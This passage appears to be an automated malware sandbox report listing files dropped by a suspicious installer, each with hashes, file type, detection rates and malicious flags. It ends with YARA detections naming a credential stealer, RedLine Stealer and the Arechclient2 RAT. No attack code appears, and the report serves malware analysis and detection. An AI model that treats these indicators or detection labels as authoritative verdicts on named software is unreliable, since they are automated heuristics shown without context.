                                                                                                                                                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                      • Filename: q27UFusYdn.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      • Filename: ipR98bCqps.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      • Filename: 5SLBlv4aUS.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      • Filename: XAcuSo8KDa.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      • Filename: WF2R8Bsptu.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      • Filename: 5F25UVdGxt.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      • Filename: f0FSseHktD.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      • Filename: wipOhNpHIG.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      • Filename: 8OeyVwIM3t.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      • Filename: f6pwu0HWXe.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.151975416221736
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:BMKLFyznZtaAgrCYqyznOmLIYvgBtXWOyznLRHB1JCHyz6I0XY4eA:fobaXCYzqmkYvgLXWXXT/Bm73
                                                                                                                                                                                                                                                                                      MD5:89E0241E653AD9089917D2BAAB49071C
                                                                                                                                                                                                                                                                                      SHA1:9622CBDBB310705F0E497E83321053B1387F8127
                                                                                                                                                                                                                                                                                      SHA-256:8FD18751D0F74EE085916699734B139F5C6C2A4D2EA3D37F02A4CE1D00B0D560
                                                                                                                                                                                                                                                                                      SHA-512:FED504575A67142746E2AECBF0EE6DC0EFFF77E09B0944EC09B546FBDA572BFD53C3C74C7C63C25E2A902779EFB23DF69CD213840E48499C2B19D761A29CF3A7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Bootstrap LogFile..-----------------..[23/04/2024 09:29:00]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[23/04/2024 09:29:00]: This Brand IOLODEFAULT Not Detected As Installed..[23/04/2024 09:29:00]: No Supported Products Were Detected On This System..[23/04/2024 09:30:02]: Telemetry Data Sent..
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.1.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):346
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.206777952048686
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:qJUIF0TCfk3VotGjZb34LJYsWziQilo54Q0TCfk3VotGjZb34L9VE/Qiloe:TI6TXVotgOLf0rik47TXVotgOL9Vrit
                                                                                                                                                                                                                                                                                      MD5:EF73FFC66D50A8B54CA8129C2A6214B3
                                                                                                                                                                                                                                                                                      SHA1:2DC5776DD4682BF2F7DD74A18CFFF9455EE30EAC
                                                                                                                                                                                                                                                                                      SHA-256:EBFAB6655CF88E965A8E77C21D83B5730BF8E8CB0C7109D61C9715396914A107
                                                                                                                                                                                                                                                                                      SHA-512:5A977C616E758A9EFC1762F248B0BDD05B5C5BA00C4072D103111921C8ECD6D9AF17448FEFF837E617C2BF46513B2BCCFE232DC4AD8F9AA4AD947E3C7F35D333
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[04/23/24 09:28:21] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/23/24 09:28:22] IsValidCommunication : Result := True...[04/23/24 09:28:38] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/23/24 09:28:38] IsValidCommunication : Result := True...
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):608080
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Joe Sandbox View:
• Filename: q27UFusYdn.exe, Detection: malicious
• Filename: ipR98bCqps.exe, Detection: malicious
• Filename: 5SLBlv4aUS.exe, Detection: malicious
• Filename: XAcuSo8KDa.exe, Detection: malicious
• Filename: WF2R8Bsptu.exe, Detection: malicious
• Filename: 5F25UVdGxt.exe, Detection: malicious
• Filename: f0FSseHktD.exe, Detection: malicious
• Filename: wipOhNpHIG.exe, Detection: malicious
• Filename: 8OeyVwIM3t.exe, Detection: malicious
• Filename: f6pwu0HWXe.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):450024
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Joe Sandbox View:
• Filename: q27UFusYdn.exe, Detection: malicious
• Filename: ipR98bCqps.exe, Detection: malicious
• Filename: 5SLBlv4aUS.exe, Detection: malicious
• Filename: XAcuSo8KDa.exe, Detection: malicious
• Filename: WF2R8Bsptu.exe, Detection: malicious
• Filename: 5F25UVdGxt.exe, Detection: malicious
• Filename: f0FSseHktD.exe, Detection: malicious
• Filename: wipOhNpHIG.exe, Detection: malicious
• Filename: 8OeyVwIM3t.exe, Detection: malicious
• Filename: f6pwu0HWXe.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):257872
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80880
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
Malicious:false
Preview:.

Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):685392
Entropy (8bit):6.872871740790978
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):608080
Entropy (8bit):6.833616094889818
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):450024
Entropy (8bit):6.673992339875127
Encrypted:false
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2046288
Entropy (8bit):6.787733948558952
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):257872
Entropy (8bit):6.727482641240852
Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80880
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):8538160
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.894832692431241
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:196608:PYATHrqMo097ughAPM6R5b9dXXvRRHmRqB7:PzLqMo09aghAk6Lnfm4B7
                                                                                                                                                                                                                                                                                      MD5:54D53F5BDB925B3ED005A84B5492447F
                                                                                                                                                                                                                                                                                      SHA1:E3F63366D0CC19D48A727ABF1954B5FC4E69035A
                                                                                                                                                                                                                                                                                      SHA-256:4D97E95F172CF1821EC078A6A66D78369B45876ABE5E89961E39C5C4E5568D68
                                                                                                                                                                                                                                                                                      SHA-512:F6A5B88E02E8F4CB45F8AAE16A6297D6F0F355A5E5EAF2CBBE7C313009E8778D1A36631122C6D2BCFEA4833C2F22DFD488142B6391B9266C32D3205575A8FF72
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1640960
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                                                                                      MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                                                                                      SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                                                                                      SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                                                                                      SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2469936
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                                                                                      MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                                                                      SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                                                                                      SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                                                                                      SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20891
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.41735141652497
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:lhFF7DUQMnBNgCxPE/7tDEZAXMtV3STIxyd3A3lafgfdl6ii04ZQoUXXhnF6b2xD:fBMYqPE/7tDEZAK3STIxnlrn6U4ZhUXp
                                                                                                                                                                                                                                                                                      MD5:FCE67E49E191BC3FD22997050C92BA01
                                                                                                                                                                                                                                                                                      SHA1:34C08D6D404A94C2447B671A49731364EA0B47FF
                                                                                                                                                                                                                                                                                      SHA-256:F8EB44951269696615DFA62E8221C73D8EBCE0A820211956D5BF6C0A70C6DACF
                                                                                                                                                                                                                                                                                      SHA-512:4C4E1F908824DAA7F3081773CA22138C756601C6C6113E0DCF9CBC958E90A5028D9BE7E5404F19432D70B1E90D46919274188718D29F9A46B97E7ACBE8222991
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1385173
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.824453259021933
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:3ThHnVpIact6qMIPrpLhmwg9lUKOxrcP4912kZp/GYOQWINQvshJC6lVwymgw:DhHVfC6q7PrpLhmwDKOxrg4r2kEINQvX
                                                                                                                                                                                                                                                                                      MD5:31885BEFE89EAE873D959F47BB548157
                                                                                                                                                                                                                                                                                      SHA1:4A1D665C491D334EAE72CDD5B784F2A064A8FBBF
                                                                                                                                                                                                                                                                                      SHA-256:A06A3D6810B4B5F73A0B71487F9B32538C34F66E26F0DC1632F3D40BF0E11B71
                                                                                                                                                                                                                                                                                      SHA-512:0C1561929D19E52229E8FE3295148C8E4BC73526A59028F9FBB5BD11D2A8163CC6137232B55082AA1FC1E5F444F583064F4BC7BF282730B754BEE3C9656ED5D0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1596416
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.466475314379774
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:h2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTMq+PDXx1lWz0pd:tmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                                                                                      MD5:EA945E6BC518D0B25AAC0FCE13AE6E16
                                                                                                                                                                                                                                                                                      SHA1:4144AC69F72190F1AD163A7CC7BD38E18109122C
                                                                                                                                                                                                                                                                                      SHA-256:6D9D8727E9D8C00EB74B27C6EE3FDC90D538F30CF6A07C4B939A03FC70CE59EE
                                                                                                                                                                                                                                                                                      SHA-512:4E2F4CF61FC6364DDACA6B0BF6D917F8E136526DC1323A8BAA48166CB291285491CC2D083B65EBE30F3DC27F62B2E154A834C721140E6004596D655269239A95
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 3680 x 2256, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):7175750
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997145606333841
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:98304:vH6iII1nFLrq9NF65iY3YZ019+s71up2h92Xf41tiE6Lldqib9dKuhSyVF8ZYGXO:/THrqMo097ughAPM6R5b9dXXvRRHmRqj
                                                                                                                                                                                                                                                                                      MD5:15FE0C4C282DF938F0AE415334FC8D11
                                                                                                                                                                                                                                                                                      SHA1:0B97FA302ED3F3C2B5DBB2DC8F0386E578EBC14D
                                                                                                                                                                                                                                                                                      SHA-256:EE44025DB5AD03B33944BF734F6F256D8B996E89F2EC22197C1767FBAE70853D
                                                                                                                                                                                                                                                                                      SHA-512:FAE66F89BC0007D59570A87EF815295A9499299086BBD2418DD17176C814A9FFC4559FC99B9FA2A1EC14E9D18B4206CE406CC483F04691F3A644CB6A84F932B5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1513199
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.757430346250855
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:Tvd4C+K336Ixx9jAF8BfdI7X5gEII/RHQRZz2oXKEP4LbBVdlZElV7:r6eqIx/g8xeaEHlQRd2kYbBVNElV7
                                                                                                                                                                                                                                                                                      MD5:428379D22B616277BE1C270B126D4FF6
                                                                                                                                                                                                                                                                                      SHA1:CDD8AA3D75B9136CFBB83EFEA76057229A239382
                                                                                                                                                                                                                                                                                      SHA-256:F4B0FC43AB9D9CC1575E9882167E6F6867D618008F1A00683F2B7E7CD303FDC3
                                                                                                                                                                                                                                                                                      SHA-512:8EB3B3C6962DF67D4F1075B7DD7087DE443832B612F480B10F82DA656C0BDE04956FF1FDE3BFF39244805CA61F97D5C78865F72EF2D6B38670AE1F2F9166A4E1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1513199
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.757430667369156
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:lvd4C+K336Ixx9jAF8BfdI7X5gEII/RHQRZz2oXKEP4LbBVdlZElV7:F6eqIx/g8xeaEHlQRd2kYbBVNElV7
                                                                                                                                                                                                                                                                                      MD5:932367769B66D6CB4E2A024612FD9383
                                                                                                                                                                                                                                                                                      SHA1:D53C138CCB4EE2F57A0D48B70CDF549C5DB8BB40
                                                                                                                                                                                                                                                                                      SHA-256:9247C761E56BAB6CBF54D5B0CB73FDECD13D411087E63A9B27E4A6941E75E21C
                                                                                                                                                                                                                                                                                      SHA-512:06E343E7BE7C80176F0741DD4D4C57373381B855B454F1B9AE2E483A84D0C2E0A44D2E9981AA35625C2F2F92F8953C7985B31FA16E71AF0993194C23D30768F1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):785920
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.809737341976147
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:QiMA0ejRLfxLY8flLb1MgXeXbFAsFWylkkoAbtEIwhsrU:QeDxttLeLFAsFlSjf
                                                                                                                                                                                                                                                                                      MD5:33230F52772BD46C208DFE85537F567F
                                                                                                                                                                                                                                                                                      SHA1:260AAB3C0DD5909C449B62DA56998F8ABD68A235
                                                                                                                                                                                                                                                                                      SHA-256:3F1759A3D89D7B7893BBCDEB180BAB911C960A6D1C80A04BCDA199A8284C36EA
                                                                                                                                                                                                                                                                                      SHA-512:98E3B0337ABD53BA405F76D1FCE17F9EC173C507B3DD3B89A259950AEE744FB337767BC534E817BF1DB7D5B692245DC5A3CF351BED06980DDEE2B0F19A48B10B
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\fak, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\fak, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\fak, Author: ditekSHen
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
